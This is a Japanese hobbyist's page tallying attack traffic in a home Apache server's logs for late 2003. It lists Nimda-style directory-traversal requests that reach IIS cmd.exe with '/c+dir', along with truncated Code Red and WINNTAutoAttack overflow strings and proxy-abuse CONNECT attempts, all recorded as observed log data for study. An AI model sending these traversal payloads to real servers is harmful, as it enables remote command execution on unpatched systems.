楽しみながら攻めつづける！　「山下の部屋」Apacheのログウォッチ　2003年11月15日～2003年12月31日

楽しみながら攻めつづける！
－HONDA '88NSR250R & '94NSR250R SE－

　
山下の部屋　自宅サーバのログを見てみよう

Apacheのログウォッチ　2003年11月15日～2003年12月31日
　
　自宅Webサーバのログ集計です。今回は11月中旬～12月末の1.5ヶ月分です。
「WINNTAutoAttack」からのアタックと思われる「/NULL.IDA」へのアクセスが増えてました。前回急激に減っていた「CodeRed」のアタックは本当に沈静化されたのか、無くなってました（ビックリ）。「NIMDA」からのアタックも減ってきてますね。
　
　新手？かと思われる「/NULL.idq」と「1.3.3.7:1337」が回数は少ないけど、ちょっと気になりますね～。前回に引き続き削除したなんちゃってコラムへのアクセス（検索エンジン経由？）が多いです。それと今回はNSR乗りのリンク集をMC16/18/21/28乗りに分けてリンク集を作成して、以前のリンク集を削除したのですが、予想以上にアクセスが多かったようです・・・
　
400：Bad Request

Method	URL	Query	回数	理由
GET	/NULL.IDA	CCC～（略）～\xffVcmd.exe$	55	WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET	/scripts/..%%35%63../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%%35c./winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ

　
404：Not Found

Method	URL	Query	回数	理由
GET	/link/link.html関連	-	528	MC16/18/21/28のリンク集に分けて削除したんですよね（汗）
GET	/column/ディレクトリなど	-	210	コラムはネタが無いので、サーバ上から削除したんですよ（汗）
GET	/_vti_bin/owssvr.dll	UL=1&～（略）～&CAPREQ=0	39	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/MSOffice/cltreq.asp	UL=1&～（略）～&CAPREQ=0	39	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/scripts/nsiislog.dll	-	13	Windows Mediaサービスに対する ISAPI 拡張欠陥による IIS サービス拒否攻撃
GET	/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/c/winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/d/winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/MSADC/root.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%25%35%63../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%252f../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%255c../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%2f../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%af../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%1c../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%9c../winnt/system32/cmd.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/root.exe	/c+dir	3	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/default.ida	XXXX～（途中略）～%u00=a	1	「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/cobalt-images/welcome2.gif	-	2	？
GET	/NULL.printer	-	1	？
GET	/NULL.idq	-	1	？
GET	/robotsxx.txt	-	1	？
GET	/scripts/..%255c%255c../winnt/system32/cmd.exe	/c+dir	1	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ

　
405：Method Not Allowed

Method	URL	Query	回数	理由
CONNECT	1.3.3.7:1337	-	2	1337番ポート？新手の広域スキャンかな？？
CONNECT	aibo.runbox.com:25	-	1	25番ポートなので、他のmaiｌサーバに接続しようとしてるのかな？
POST	http://162.83.244.125:25/	-	1	POST？
POST	http://64.216.218.2:25/	-	1	POST？
POST	http://67.233.213.49:25/	-	1	POST？

　
501：Not Implemented

Method	URL	Query	回数	理由
SEARCH	/	-	2	？

常時録画ドライブレコーダーあんしんmini【動画公開中】
現在某最大手ショッピングモールで「カー用品ランキング1位独占中」